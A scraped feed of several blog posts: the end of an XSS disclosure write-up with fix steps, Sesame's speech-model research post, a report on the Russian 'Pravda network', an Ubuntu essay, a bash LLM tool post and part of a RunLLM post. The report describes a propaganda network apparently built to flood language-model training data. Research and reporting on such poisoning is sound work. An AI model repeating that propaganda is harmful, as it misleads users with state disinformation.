    I set out to report as many exploited instances as possible. What I didn’t anticipate was just how difficult that would be. I personally uncovered over 300 exploited domains, yet most had no vulnerability disclosure program. Hours went into tracking down contact emails and submission forms, but most of my reports went nowhere—buried in unread inboxes or bounced back with no response.

Still, there were wins. Some reports made it through, earning me acknowledgements from major organizations like the U.S. Department of Health & Human Services and CERT-EU. A handful of vulnerable assets even got fixed—some thanks to my disclosures, others by sheer coincidence.

    That’s when I decided to start my own blog—to shed light on overlooked attack vectors and reach a wider audience. If there’s one thing this experience reinforced, it’s that these problems extend far beyond a handful of exploited domains—and they don’t get fixed until someone makes enough noise.

    Krpano’s Response

    Alongside my reporting mission, I reached out to Krpano’s developers to highlight the vulnerable implementation on their own website and raise concerns about the handling of the XML parameter. The library’s main developer, Klaus, responded promptly and professionally, taking my report seriously. Within a few weeks, he implemented a fix in version 1.22.4, restricting external resources from being loaded through the XML parameter—effectively closing off this attack vector.

    Big kudos to Klaus 👑

    360XSS: How to Fix It?

🔍 Identify all instances of Krpano on your website (see the sketch after this list).
    ⬆️ Update to the latest version 1.22.4.
    ❌ Set the passQueryParameter configuration to false.
    🔍 Scan for SEO Poisoning – Find and remove infected pages via Google Search Console.
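
For that first step, here's a minimal sketch of what an audit could look like, assuming a local web root at /var/www/html and that tours are embedded via embedpano() in HTML files (both assumptions; adjust for your stack):

import pathlib

root = pathlib.Path("/var/www/html")   # hypothetical web root
for path in root.rglob("*.htm*"):
    text = path.read_text(errors="ignore").lower()
    if "embedpano" in text or "krpano" in text:
        # flag embeds that never mention the passQueryParameter setting
        status = "ok" if "passqueryparameter" in text else "check: no explicit passQueryParameter"
        print(path, "-", status)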

    Stay Safe 💪🏻
    ]]>
    https://olegzay.com/360xss/ hacker-news-small-sites-43198536 Thu, 27 Feb 2025 21:09:14 GMT
<![CDATA[Crossing the uncanny valley of conversational voice]]> thread link) | @jasonpeacock
    February 27, 2025 | https://www.sesame.com/research/crossing_the_uncanny_valley_of_voice | archive.org

    February 27, 2025

    Brendan Iribe, Ankit Kumar, and the Sesame team

    How do we know when someone truly understands us? It is rarely just our words—it is in the subtleties of voice: the rising excitement, the thoughtful pause, the warm reassurance.

    Voice is our most intimate medium as humans, carrying layers of meaning through countless variations in tone, pitch, rhythm, and emotion.

    Today’s digital voice assistants lack essential qualities to make them truly useful. Without unlocking the full power of voice, they cannot hope to effectively collaborate with us. A personal assistant who speaks only in a neutral tone has difficulty finding a permanent place in our daily lives after the initial novelty wears off.

    Over time this emotional flatness becomes more than just disappointing—it becomes exhausting.

    Achieving voice presence

    At Sesame, our goal is to achieve “voice presence”—the magical quality that makes spoken interactions feel real, understood, and valued. We are creating conversational partners that do not just process requests; they engage in genuine dialogue that builds confidence and trust over time. In doing so, we hope to realize the untapped potential of voice as the ultimate interface for instruction and understanding.

    Key components

    • Emotional intelligence: reading and responding to emotional contexts.
    • Conversational dynamics: natural timing, pauses, interruptions and emphasis.
    • Contextual awareness: adjusting tone and style to match the situation.
    • Consistent personality: maintaining a coherent, reliable and appropriate presence.

    We’re not there yet

    Building a digital companion with voice presence is not easy, but we are making steady progress on multiple fronts, including personality, memory, expressivity and appropriateness. This demo is a showcase of some of our work in conversational speech generation. The companions shown here have been optimized for friendliness and expressivity to illustrate the potential of our approach.

    Conversational voice demo

    1. Microphone permission is required. 2. Calls are recorded for quality review but not used for ML training and are deleted within 30 days. 3. By using this demo, you are agreeing to our Terms of Use and Privacy Policy. 4. We recommend using Chrome (Audio quality may be degraded in iOS/Safari 17.5).

    Technical post

    Authors

    Johan Schalkwyk, Ankit Kumar, Dan Lyth, Sefik Emre Eskimez, Zack Hodari, Cinjon Resnick, Ramon Sanabria, Raven Jiang

    To create AI companions that feel genuinely interactive, speech generation must go beyond producing high-quality audio—it must understand and adapt to context in real time. Traditional text-to-speech (TTS) models generate spoken output directly from text but lack the contextual awareness needed for natural conversations. Even though recent models produce highly human-like speech, they struggle with the one-to-many problem: there are countless valid ways to speak a sentence, but only some fit a given setting. Without additional context—including tone, rhythm, and history of the conversation—models lack the information to choose the best option. Capturing these nuances requires reasoning across multiple aspects of language and prosody.

To address this, we introduce the Conversational Speech Model (CSM), which frames the problem as an end-to-end multimodal learning task using transformers. It leverages the history of the conversation to produce more natural and coherent speech. There are two key takeaways from our work. The first is that CSM operates as a single-stage model, thereby improving efficiency and expressivity. The second is our evaluation suite, which is necessary for evaluating progress on contextual capabilities and addresses the fact that common public evaluations are saturated.

    Background

    One approach to modeling audio with transformers is to convert continuous waveforms into discrete audio token sequences using tokenizers. Most contemporary approaches ([1], [2]) rely on two types of audio tokens:

    1. Semantic tokens: Compact speaker-invariant representations of semantic and phonetic features. Their compressed nature enables them to capture key speech characteristics at the cost of high-fidelity representation.
    2. Acoustic tokens: Encodings of fine-grained acoustic details that enable high-fidelity audio reconstruction. These tokens are often generated using Residual Vector Quantization (RVQ) [2]. In contrast to semantic tokens, acoustic tokens retain natural speech characteristics like speaker-specific identity and timbre.

A common strategy first models semantic tokens and then generates audio using RVQ or diffusion-based methods. Decoupling these steps allows for a more structured approach to speech synthesis—the semantic tokens provide a compact, speaker-invariant representation that captures high-level linguistic and prosodic information, while the second stage reconstructs the fine-grained acoustic details needed for high-fidelity speech. However, this approach has a critical limitation: semantic tokens are a bottleneck that must fully capture prosody, but ensuring this during training is challenging.

    RVQ-based methods introduce their own set of challenges. Models must account for the sequential dependency between codebooks in a frame. One method, the delay pattern (figure below) [3], shifts higher codebooks progressively to condition predictions on lower codebooks within the same frame. A key limitation of this approach is that the time-to-first-audio scales poorly because an RVQ tokenizer with N codebooks requires N backbone steps before decoding the first audio chunk. While suitable for offline applications like audiobooks, this delay is problematic in a real-time scenario.

    Example of delayed pattern generation in an RVQ tokenizer with 4 codebooks
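
A minimal sketch of the delay pattern itself (my own illustration; the array layout is an assumption): codebook k is shifted right by k steps, which is why the first complete frame is only decodable after N backbone steps.

import numpy as np

def delay_pattern(codes, pad=-1):
    # codes: (n_codebooks, n_frames) integer array of RVQ tokens
    n_q, T = codes.shape
    out = np.full((n_q, T + n_q - 1), pad)
    for k in range(n_q):
        out[k, k:k + T] = codes[k]   # shift codebook k right by k steps
    return out

codes = np.arange(12).reshape(4, 3)  # 4 codebooks, 3 frames
print(delay_pattern(codes))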

    Conversational Speech Model

    CSM is a multimodal, text and speech model that operates directly on RVQ tokens. Inspired by the RQ-Transformer [4], we use two autoregressive transformers. Different from the approach in [5], we split the transformers at the zeroth codebook. The first multimodal backbone processes interleaved text and audio to model the zeroth codebook. The second audio decoder uses a distinct linear head for each codebook and models the remaining N – 1 codebooks to reconstruct speech from the backbone’s representations. The decoder is significantly smaller than the backbone, enabling low-latency generation while keeping the model end-to-end.

    CSM model inference process. Text (T) and audio (A) tokens are interleaved and fed sequentially into the Backbone, which predicts the zeroth level of the codebook. The Decoder then samples levels 1 through N – 1 conditioned on the predicted zeroth level. The reconstructed audio token (A) is then autoregressively fed back into the Backbone for the next step, continuing until the audio EOT symbol is emitted. This process begins again on the next inference request, with the interim audio (such as a user utterance) being represented by interleaved audio and text transcription tokens.

    Both transformers are variants of the Llama architecture. Text tokens are generated via a Llama tokenizer [6], while audio is processed using Mimi, a split-RVQ tokenizer, producing one semantic codebook and N – 1 acoustic codebooks per frame at 12.5 Hz. [5] Training samples are structured as alternating interleaved patterns of text and audio, with speaker identity encoded directly in the text representation.
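
To make the backbone/decoder split concrete, here is a toy sketch in PyTorch (not Sesame's code; all sizes, names, and the conditioning scheme are assumptions). The backbone supplies a hidden state and the zeroth codebook token; a small decoder with one head per remaining codebook fills in the rest of the frame:

import torch
import torch.nn as nn

N_CODEBOOKS, VOCAB, D = 8, 1024, 256   # toy sizes, not the paper's

class ToyDecoder(nn.Module):
    # one distinct linear head per codebook level 1..N-1, conditioned on
    # the backbone state plus the embedding of the previous level's token
    def __init__(self):
        super().__init__()
        self.embed = nn.Embedding(VOCAB, D)
        self.heads = nn.ModuleList([nn.Linear(D, VOCAB) for _ in range(N_CODEBOOKS - 1)])

    def forward(self, state, prev_token, level):
        return self.heads[level - 1](state + self.embed(prev_token))

decoder = ToyDecoder()
state = torch.randn(1, D)                 # stand-in for a backbone hidden state
codes = [torch.randint(0, VOCAB, (1,))]   # pretend the backbone sampled codebook 0
for level in range(1, N_CODEBOOKS):
    logits = decoder(state, codes[-1], level)
    codes.append(logits.argmax(dim=-1))   # greedy choice of codebook `level`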

    Compute amortization

This design introduces significant infrastructure challenges during training. The audio decoder processes an effective batch size of B × S and N codebooks autoregressively, where B is the original batch size, S is the sequence length, and N is the number of RVQ codebook levels. This high memory burden, even with a small model, slows down training, limits model scaling, and hinders rapid experimentation, all of which are crucial for performance.

    To address these challenges, we use a compute amortization scheme that alleviates the memory bottleneck while preserving the fidelity of the full RVQ codebooks. The audio decoder is trained on only a random 1/16 subset of the audio frames, while the zeroth codebook is trained on every frame. We observe no perceivable difference in audio decoder losses during training when using this approach.

Amortized training process. The backbone transformer models the zeroth level across all frames (highlighted in blue), while the decoder predicts the remaining N – 1 levels, but only for a random 1/16th of the frames (highlighted in green). The top section highlights the specific frames modeled by the decoder for which it receives loss.
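
A minimal sketch of the frame-sampling idea in PyTorch (an assumption about the general shape, not the actual training code):

import torch

def sample_decoder_frames(B, S, frac=1 / 16):
    # pick a random 1/16th of frame positions per sequence for the decoder
    # loss; the zeroth codebook still receives a loss on every frame
    n_keep = max(1, int(S * frac))
    perm = torch.rand(B, S).argsort(dim=1)
    return perm[:, :n_keep]               # (B, n_keep) frame indices

idx = sample_decoder_frames(B=8, S=2048)  # 128 frames per sequence
print(idx.shape)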

    Experiments

    Dataset: We use a large dataset of publicly available audio, which we transcribe, diarize, and segment. After filtering, the dataset consists of approximately one million hours of predominantly English audio.

    Model Sizes: We trained three model sizes, delineated by the backbone and decoder sizes:

    • Tiny: 1B backbone, 100M decoder
    • Small: 3B backbone, 250M decoder
    • Medium: 8B backbone, 300M decoder

    Each model was trained with a 2048 sequence length (~2 minutes of audio) over five epochs.

    Samples

    Paralinguistics

    Sentences from Base TTS

    Foreign words

    Sentences from Base TTS

    Contextual expressivity

    Samples from Expresso, continuation after chime

    Pronunciation correction

The pronunciation correction sentence is a recording; all other audio is generated.

    Conversations with multiple speakers

    Single generation using audio prompts from two speakers

    Evaluation

    Our evaluation suite measures model performance across four key aspects: faithfulness to text, context utilization, prosody, and latency. We report both objective and subjective metrics—objective benchmarks include word error rate and novel tests like homograph disambiguation, while subjective evaluation relies on a Comparative Mean Opinion Score (CMOS) human study using the Expresso dataset.

    Objective metrics

    Traditional benchmarks, such as word error rate (WER) and speaker similarity (SIM), have become saturated—modern models, including CSM, now achieve near-human performance on these metrics.

    Objective metric results for Word Error Rate (top) and Speaker Similarity (bottom) tests, showing the metrics are saturated (matching human performance).

    To better assess pronunciation and contextual understanding, we introduce a new set of phonetic transcription-based benchmarks.

    • Text understanding through Homograph Disambiguation: Evaluates whether the model correctly pronounced different words with the same orthography (e.g., “lead” /lɛd/ as in “metal” vs. “lead” /liːd/ as in “to guide”).
    • Audio understanding through Pronunciation Continuation Consistency: Evaluates whether the model maintains pronunciation consistency of a specific word with multiple pronunciation variants in multi-turn speech. One example is “route” (/raʊt/ or /ruːt/), which can vary based on region of the speaker and context.

    Objective metric results for Homograph Disambiguation (left) and Pronunciation Consistency (right) tests, showing the accuracy percentage for each model’s correct pronunciation. Play.ht, Elevenlabs, and OpenAI generations were made with default settings and voices from their respective API documentation.

    The graph above compares objective metric results across three model sizes. For Homograph accuracy we generated 200 speech samples covering 5 distinct homographs—lead, bass, tear, wound, row—with 2 variants for each and evaluated pronunciation consistency using wav2vec2-lv-60-espeak-cv-ft. For Pronunciation Consistency we generated 200 speech samples covering 10 distinct words that have common pronunciation variants—aunt, data, envelope, mobile, route, vase, either, adult, often, caramel.
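
The post doesn't include its scoring script, but a sketch of phoneme transcription with that checkpoint might look like the following (the calls follow the model's published usage; the scoring rule at the end is my assumption):

import torch
from transformers import Wav2Vec2Processor, Wav2Vec2ForCTC

MODEL = "facebook/wav2vec2-lv-60-espeak-cv-ft"   # phoneme-level CTC model
processor = Wav2Vec2Processor.from_pretrained(MODEL)
model = Wav2Vec2ForCTC.from_pretrained(MODEL)

def phonemes(waveform, sr=16000):
    inputs = processor(waveform, sampling_rate=sr, return_tensors="pt")
    with torch.no_grad():
        logits = model(inputs.input_values).logits
    return processor.batch_decode(logits.argmax(dim=-1))[0]

# a generated sample of "lead" could then be scored by whether the expected
# phoneme sequence (e.g. "l ɛ d" for the metal vs. "l iː d" for the verb)
# appears in the transcription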

    In general, we observe that performance improves with larger models, supporting our hypothesis that scaling enhances the synthesis of more realistic speech.

    Subjective metrics

    We conducted two Comparative Mean Opinion Score (CMOS) studies using the Expresso dataset to assess the naturalness and prosodic appropriateness of generated speech for CSM-Medium. Human evaluators were presented with pairs of audio samples—one generated by the model and the other a ground-truth human recording. Listeners rated the generated sample on a 7-point preference scale relative to the reference. Expresso’s diverse expressive TTS samples, including emotional and prosodic variations, make it a strong benchmark for evaluating appropriateness to context.

    In the first CMOS study we presented the generated and human audio samples with no context and asked listeners to “choose which rendition feels more like human speech.” In the second CMOS study we also provide the previous 90 seconds of audio and text context, and ask the listeners to “choose which rendition feels like a more appropriate continuation of the conversation.” Eighty people were paid to participate in the evaluation and rated on average 15 examples each.

    Subjective evaluation results on the Expresso dataset. No context: listeners chose “which rendition feels more like human speech” without knowledge of the context. Context: listeners chose “which rendition feels like a more appropriate continuation of the conversation” with audio and text context. 50:50 win–loss ratio suggests that listeners have no clear preference.

    The graph above shows the win-rate of ground-truth human recordings vs CSM-generated speech samples for both studies. Without conversational context (top), human evaluators show no clear preference between generated and real speech, suggesting that naturalness is saturated. However, when context is included (bottom), evaluators consistently favor the original recordings. These findings suggest a noticeable gap remains between generated and human prosody in conversational speech generation.

    Open-sourcing our work

    We believe that advancing conversational AI should be a collaborative effort. To that end, we’re committed to open-sourcing key components of our research, enabling the community to experiment, build upon, and improve our approach. Our models will be available under an Apache 2.0 license.

    Limitations and future work

    CSM is currently trained on primarily English data; some multilingual ability emerges due to dataset contamination, but it does not perform well yet. It also does not take advantage of the information present in the weights of pre-trained language models.

    In the coming months, we intend to scale up model size, increase dataset volume, and expand language support to over 20 languages. We also plan to explore ways to utilize pre-trained language models, working towards large multimodal models that have deep knowledge of both speech and text.

    Ultimately, while CSM generates high quality conversational prosody, it can only model the text and speech content in a conversation—not the structure of the conversation itself. Human conversations are a complex process involving turn taking, pauses, pacing, and more. We believe the future of AI conversations lies in fully duplex models that can implicitly learn these dynamics from data. These models will require fundamental changes across the stack, from data curation to post-training methodologies, and we’re excited to push in these directions.

    Join us

    If you’re excited about building the most natural, delightful, and inspirational voice interfaces out there, reach out—we’re hiring. Check our open roles.

    ]]>
    https://www.sesame.com/research/crossing_the_uncanny_valley_of_voice hacker-news-small-sites-43198509 Thu, 27 Feb 2025 21:06:01 GMT
    <![CDATA[Report on Russian efforts to flood LLM/AI models with pro-Russian content]]> thread link) | @avs733
    February 27, 2025 | https://www.americansunlight.org/updates/new-report-russian-propaganda-may-be-flooding-ai-models | archive.org

    Click here to read the report.

    Click here to read the press release.

    Click here to access the database.

    It may be tempting to consider Russian influence campaigns in the United States and other democratic countries as merely an afterthought, given the chaos and uncertainty that Donald Trump’s second presidency is causing. But his reelection–and the growing influence of Russia-friendly, far right parties worldwide–only makes these campaigns more relevant. The Trump administration is actively undoing protections against foreign kleptocratic dealings and disinformation in the United States while the Trump-led United States is apparently siding with authoritarian Russia against democratic states like Ukraine. These actions are essentially putting a for-sale sign on the American information space and dealing a devastating blow to democratic and information resilience worldwide.

    The chaos of the second Trump administration also serves as a distraction that allows Russian influence campaigns to continue to grow unchecked. The American Sunlight Project’s latest report explores the newest expansion of the so-called “Pravda network,” a collection of web pages and social media accounts that aggregate pro-Russia propaganda around the world. This expansion explicitly targets the United States, among dozens of other new targets that include countries in Africa, Asia, Europe, and North America. The network is also newly targeting prominent heads of state, international organizations, and commonly spoken languages.

    More concerning than the network’s geographic expansion are its growing capabilities and how other information operations could copy the Pravda network’s model in the future. The network itself is a highly centralized system of largely automated propaganda aggregation, translation, and sharing across the network’s massive footprint. ASP estimates that the network is producing at least 3 million articles of pro-Russia propaganda per year, a number that does not include the network’s activity on X (Twitter), Telegram, Bluesky, and VK. Given the past growth of this network, this rate is likely to increase.

    Such a large network poses several risks. Both the general public and prominent leaders are more likely to see the network’s content–which is laden with harmful, anti-democratic disinformation–given how pervasive it is. This means that audiences might be more likely to believe and share this content, and the content is more likely to be wittingly or unwittingly laundered by more legitimate sources to even bigger audiences. Pravda network articles have already been cited on Wikipedia, for example, and Trump’s recent accusation that Ukraine was somehow responsible for the war clearly shows that influential figures in U.S. politics readily repeat Russian disinformation.

The Pravda network also appears to be set up to flood large-language models with pro-Kremlin content. Past research shows that all ten major AI chatbots can reproduce Russian disinformation in response to certain prompts, suggesting that their training data contained Russian disinformation to begin with. The fact that the Pravda network is rapidly churning out content, without any clear intention of building actual human readership on its poorly designed websites, suggests that it may be aiming to land its content in LLM training data. Without more robust safeguards on training datasets and LLMs alike, the risk that the network’s content is eventually parroted by AI chatbots and other LLMs is very large–regardless of the network’s intent.

    Thus, we enter a new chapter of Russian information operations. Democracies not only have to contend with a chaotic U.S. government on the backdrop of ever-flourishing Russian disinformation; advancements in technology such as AI also promise to turbocharge foreign influence campaigns in unforeseen ways. Major players in government, civil society, and the private sector must act to ensure transparency and oversight of AI training models and prevent the most harmful effects of this new era of information operations, and the public should understand that the internet they are navigating becomes more misleading by the minute.

    ]]>
    https://www.americansunlight.org/updates/new-report-russian-propaganda-may-be-flooding-ai-models hacker-news-small-sites-43198383 Thu, 27 Feb 2025 20:51:36 GMT
    <![CDATA[Linux Changes Lives]]> thread link) | @jethronethro
    February 27, 2025 | https://catecheticconverter.com/im-probably-going-to-be-that-guy-to-some-of-you | archive.org

I’m probably going to be “that guy” to some of you. That guy who discovers something new to him and then integrates it into his personality and won’t shut up about it until something else comes along to take its place. I’ve been that guy kind of all my life, to be honest (ask my friends). My current “that guy” thing is the Linux distribution (I restrained myself from saying “distro”) known as Ubuntu, and it has, in a small way, changed my life.

So here’s the deal. I’ve been an Apple guy since at least 2006, after an obsession with Sony products (and the building of a PC just after high school). My first ever Apple product was an iPod, the one with the touch wheel. I was so enamored with the design (as I was with the late-90s clear Macs) that I decided to finally purchase a Mac computer for myself. After my beloved Sony Vaio laptop was stolen from my apartment in college, I went almost a year without a computer (living fearfully and carefully with my entire life on a thumb drive that traveled with me everywhere—this was well before cloud storage). With money bequeathed to me from my grandmother after her funeral, I purchased that ubiquitous white plastic Apple MacBook that everyone had (except for the kids who had the black pro model). And I used it all through the rest of college and my seminary education. It was chipped and scratched by the time I got a good deal on a 27-inch iMac with an Intel processor, thanks to a friend who worked at the Apple Store. This was during my first year of marriage, before kids and when my wife had a very well-paying accounting job for a major firm (while I worked as the lowest-paid priest in my diocese).

    What I love(d) about Apple is the seriousness they took with regards to design. They aimed to make beautiful products. And not only were they beautiful, they simply worked.

    I hate Windows. I pretty much hate everything Microsoft. But I really hate Windows. I especially hated that Windows lied to me. Like when I went to delete software, just sending it to the recycle bin was not enough. You had to track down stuff in the registry after running an uninstaller, just to make sure it was all gone. What blew my mind with my first Mac was that deleting software was as simple as moving it to “trash.” Then emptying that trash. Then there was the refinement. Pages offered crisp-looking documents with a range of beautiful fonts. The icons for minimizing and closing windows in MacOS looked like candied jewels. The physical hardware of the machines were minimalist works of art. No company aside from Braun or Dyson seemed to be focused on the connection between function and form quite like Apple. And that philosophy carried over into the software side as well. Jobs was correct in recognizing that personal computing was only going to take off if things were designed with an eye toward intuition. He hung around with guys like Steve Wozniak and Bill Gates, guys who viewed computers in a vein similar to HAM radios. But Jobs knew that he’d have to remove personal computers from the realm of hobbyists and offer a product that seemed “finished” if people were going to shell out loads of money in order to use that product. And the proof is right in front of us: the Macintosh played an instrumental role in the adoption of personal computers and Apple sits as the most valuable company in the world.

Reading Walter Isaacson’s biography of Steve Jobs reveals something many people have noted: Apple struggles without Steve Jobs. When Apple fired Jobs, they floundered as a company and got too spread-out, offering products that no one seemed interested in purchasing. Jobs’ return brought with it the foundation of success that the company rides today, but looking at Apple these days, you can see that they’ve not really been able to overcome Jobs’ death (compounded by the loss of Jony Ive from the design side of things as well). Jobs’ philosophy of ensuring that these consumer products simply “work” has morphed instead into an approach of spoon-feeding applications and gradually locking people into the Apple ecosystem, seemingly more to keep them from leaving than out of any real benefit to remaining.

Take my beloved Pages, for instance. Every time I’ve updated that program (which has gradually come to feel more like a mobile app than a proper word processor) I’ve lost fonts that I used, and certain settings are gone or buried for reasons that don’t make a whole lot of sense to anyone but the engineers at Apple. Then there’s the planned obsolescence. Which, I get. Maintaining old hardware and software requires people and thus incurs costs on diminishing returns and all of that. But Apple continues to keep their hardware and software locked up, which results in these beautiful products being seen as disposable and discardable, furthering an ugly and environmentally catastrophic sense of consumerism.

    Jobs seemed to hold the view that a computer should not insist upon itself. The computer, for him, is a tool toward a different end, not an end in itself. Increasingly, Apple feels like they’re making products for the sake of the product, and making changes to those products that feel insistent and not like the catalyst for liberation that Jobs envisioned in his dad’s garage all those years ago.

    Which brings me, finally, to Ubuntu.

So that mid-2011 Mac I spoke about? I still have it and use it as my “home” computer. When I was called to be the priest of Saint Mary’s in Honolulu, the private school I had been chaplain to gave Saint Mary’s two refurbished Macs as a gift. Both of them the same year and model as my home computer. That was in March of 2020. One of the machines I appropriated for use as my office computer (because I didn’t have one at the church when I arrived). Shortly after the move, I started noticing that my home machine was running slow. I had a ton of stuff on there, so it wasn’t that unexpected. Then the office machine started chugging and I kept getting notices that my OS was no longer able to receive security updates, etc. It was becoming clear that I needed to buy a new computer—or two.

My parish is not big. I do not make a ton of money. So the idea of asking the parish to purchase me a new computer felt selfish. I was not about to keep apologizing to folks about the leaky roof while logging onto a brand new iMac (I really liked the mint green one). Plus there was the added element of what I’d said above about Apple, that the newer Macs were harder to repair and treated as more “disposable” (they glued the motherboard to the screen!). Conventional wisdom (that I picked up when I was working at EB Games in 2000 and part of the “PC Master Race”) was that a Windows machine should last about five years and a Mac between seven and ten, depending on use-level. These machines were hitting fourteen years of age, so old that I could not AirDrop from my iOS devices to them. So, it was time.

Then, Trump happened. Again. And suddenly all the big tech stuff changed in my eyes. Beating big tech felt like both a Christian responsibility and a patriotic need. I thought back to the early chapters of Steve Jobs’ biography and how he articulated the role tech can play in personal liberation. So I decided that I needed to learn Linux. I actually checked out Linux For Dummies from the library. In the course of my reading I learned that not only does Linux run really great on older Macs, but that Ubuntu in particular shines on them.

    This all means that I found myself in a position to try something new, something that would maybe inject new life into my computers—as well as into me and my relationship with technology. I dug out an old external drive and got to work on creating a bootable USB drive for experimenting with Ubuntu on Mac. It was a bit more complicated than I expected. One computer basically forgot that it was able to access a WiFi network, so I had to create the drive on a separate Mac of the same model. I couldn’t use Etcher to get things going (the Mac was too old), so I had to learn to use the Terminal on Mac (which I’d only ever used sparingly; it reminded me of DOS back in the day, which helped when I built my own PC, or when I had to do stuff with BIOS). I had two machines going, plus my iPad for instructions. I felt like I was hacking the Gibson. Once I got the bootable drive set up, I plugged it into the relevant machine, restarted it in order to boot from the drive, and was blown away at how refined and pretty Ubuntu looked—while feeling a deep sense of satisfaction that I got it to work at all. I fell in love almost immediately, so I wiped the machine’s drive and installed Ubuntu as the operating system, running it like it was a fresh computer.

    I’m writing this on that machine, using LibreOffice. I love it so much that I get excited to come to work just to use this computer.

    Running Ubuntu on this Mac has had an immense impact on my relationship with computers in just the few weeks I’ve had it. Not only does it feel like I’m using a completely brand new computer, it feels rebellious, like I’m in some sort of special club. When I check out apps online and I see that it has Linux support, I feel like I’m part of an inside joke that only cool people get.

    Linux feels rebellious to me. I’m sure there are folks who run servers that do not feel this way. But for someone that lives among the normies, to whom it’s either Windows or MacOS, Android or iPhone, this feels counter-cultural. And it feels empowering, like I get to decide when my technology is out of date. I mean, I’m writing this on a nearly fifteen year old machine (which still looks beautiful), using a twenty-five year old Pro Keyboard (the one with the midnight blue clear plastic buttons—the peak of personal computing design—I got it for like ten bucks at a thrift store). There’s plenty of life left in these things and they do not deserve to be relegated to trash heaps. Indeed, the aesthetic beauty of these products is enduring and Linux ensures that they are still functionally useful.

    There’s also a spiritual dimension to this. In not letting a mega-corporation or three make my technology decisions for me, I am asserting my own self-worth. I am also experiencing a sort of revival, what Saint Paul refers to as the transforming of one’s mind, in opposition to being “conformed to the ways of this world.” The tools and the knowledge to use them are out there. It just takes a little time and effort to acquire them. They don’t need to be doled out to me from on high. Rather, they’re all around us and among us, even within us. And this fact is utterly liberating to know.

    It’s weird to say, I guess, but this little operating system has had a huge impact on me. Linux changes lives.

    The Rev. Charles Browning II is the rector of Saint Mary’s Episcopal Church in Honolulu, Hawai’i. He is a husband, father, surfer, and frequent over-thinker. Follow him on Mastodon and Pixelfed.

    ]]>
    https://catecheticconverter.com/im-probably-going-to-be-that-guy-to-some-of-you hacker-news-small-sites-43198260 Thu, 27 Feb 2025 20:40:12 GMT
    <![CDATA[Show HN: Prompting LLMs in Bash scripts]]> thread link) | @chilipepperhott
    February 27, 2025 | https://elijahpotter.dev/articles/prompting_large_language_models_in_bash_scripts | archive.org

    I’ve been experimenting with using LLMs locally for generating datasets to test Harper against. I might write a blog post about the technique (which I am grandiosely calling “LLM-assisted fuzzing”), but I’m going to make you wait.

    I’ve written a little tool called ofc that lets you insert Ollama into your bash scripts. I think it’s pretty neat, since it (very easily) lets you do some pretty cool things.

    For example, you can swap out the system prompt, so if you want to compare behavior across prompts, you can just toss it in a loop:

    #!/bin/bash
    
    subreddits=("r/vscode" "r/neovim" "r/wallstreetbets")
    
    
    for subreddit in "${subreddits[@]}"; do
      echo "++++++++ BEGIN $subreddit ++++++++"
      ofc --system-prompt "Assume the persona of a commenter of $subreddit" "What is your opinion on pepperjack cheese."
    done
    

    Or, you can instruct a model to prompt itself:

    ofc --system-prompt "$(ofc "Write a prompt for a large language model that makes it think harder. ")" "What is a while loop?"
    

    ofc is installable from either crates.io or its repository.

    # From crates.io:
    cargo install ofc --locked
    
    # Or directly from the repository:
    cargo install --git https://github.com/elijah-potter/ofc --locked
    
    ]]>
    https://elijahpotter.dev/articles/prompting_large_language_models_in_bash_scripts hacker-news-small-sites-43197752 Thu, 27 Feb 2025 19:46:55 GMT
    <![CDATA[The Hard Thing About Building AI Applications]]> thread link) | @cgwu
    February 27, 2025 | https://www.runllm.com/blog/the-hard-thing-about-building-ai-applications | archive.org

    This week, we shared our vision for the AI Support Engineer and key features that set it apart from generic AI tools. The AI Support Engineer we built is the result of two years of deep thinking about what it takes to develop a great Native-AI application experience. And we’ve also learned by using a lot of other AI apps, some of which became our favorites.

    What we’ve found is that the best experiences with AI usually happen when things just work — when the system figures something out before we do or when work happens behind the scenes. It’s a kind of magic that most products don’t deliver. But we also know that making AI feel effortless takes relentless attention to detail and quality — how the product makes you feel when you’re using it. And that’s honestly been one of the harder aspects of this journey.

    As we’ve built RunLLM — and to keep things straight for ourselves — we developed a set of principles about what makes a great AI product. Many of the features we’ve shared this week stem from these principles. We’re proud of the progress we’ve made, and — if you’ll indulge us — we’re excited to share those with you.

    Our Principles for Building AI-Native Apps

    1. Anticipates Needs – Delivers what you need before you ask

    One of the most magical things that modern AI enables (which simply wasn’t possible before) is the ability to figure things out for you. By default, an AI product shouldn’t ask you to fill out forms or spell out every detail. It should let you just point it in the right direction, and it should anticipate your needs. Instead of waiting for you to constantly tell it what to do, it should just work.

    2. Aware of Limits – Knows when to stop and ask for help

    No one trusts a system (or a person) that pretends to know everything. The best AI recognizes when it’s uncertain, quantifies its confidence, provides citations, and escalates complex issues to the right experts. With both humans and AI, credibility comes from knowing when to seek input rather than bluffing through uncertainty. Because AI is doing so much behind the scenes, it needs to build trust with you by being transparent and calling out when it doesn’t know something.

    3. Clarifies Complexity – Can simplify info without losing depth

    Information overload is a problem that AI is well-suited to solve when designed correctly. The best AI products distill a high volume of information into something manageable by highlighting what matters and presenting information in a way that is clear, concise, and actionable. The key is balance: provide a simple answer at first but allow users to go deeper when necessary. AI needs to know how to “speak in headlines” but then also be ready to give you all the details.

    4. Shoulders Work – Does the heavy lifting so you don’t have to

    What AI applications are ultimately about is doing work for you. The most popular example of this today is OpenAI’s Deep Research: You give it an area to explore, go focus on other things, and come back to find a full-fledged report ready for you. AI applications may not be ready to take on months-long projects (yet?), but they certainly should be able to work unsupervised.

    Our Principles Applied to RunLLM

    Each of these core principles has directly influenced the way we’ve been building (and will continue to build) RunLLM.

    1. Seamless Onboarding — Anticipates Needs

    Building an onboarding experience that figures things out for you was one of the most fun things we’ve done at RunLLM. For most of the past year, adding data to RunLLM required filling out a long form — what kind of data you were ingesting, where your data lived, which URLs to crawl, and so on. Once you set up an assistant, learning about all the things RunLLM did required having, well, a person tell you.

    Now, all you have to do is point RunLLM at the URL for your docs and it figures out the rest. Within a couple minutes, your assistant is ready to go, and RunLLM will teach you about itself along the way — how to add more data, how to teach it when it gets something wrong, and how to deploy it for your users to use.

    2. Aware of Limits — Knows When to Stop and Ask for Help

    Most users today are (rightly) skeptical of AI. We’ve all seen LLMs hallucinate. At RunLLM, trust is a top priority — especially because our audience relies on accurate technical answers in high-stakes situations. Choosing the wrong technology, misconfiguring a system, or struggling to get started can cost developers time, money, and even customers. Here’s how we try to build trust:

    1. We’re not afraid to say “I don’t know.” RunLLM isn’t afraid to tell you it doesn’t have the answer to a question — better to say I don’t know than to lose trust.
    2. We tell you how confident we are (and why). Each answer is framed to communicate our confidence and also comes with citations, so you can verify our work if needed.
    3. We learn from our mistakes. When you correct RunLLM, it remembers the right answer — so it won’t make the same mistake twice.
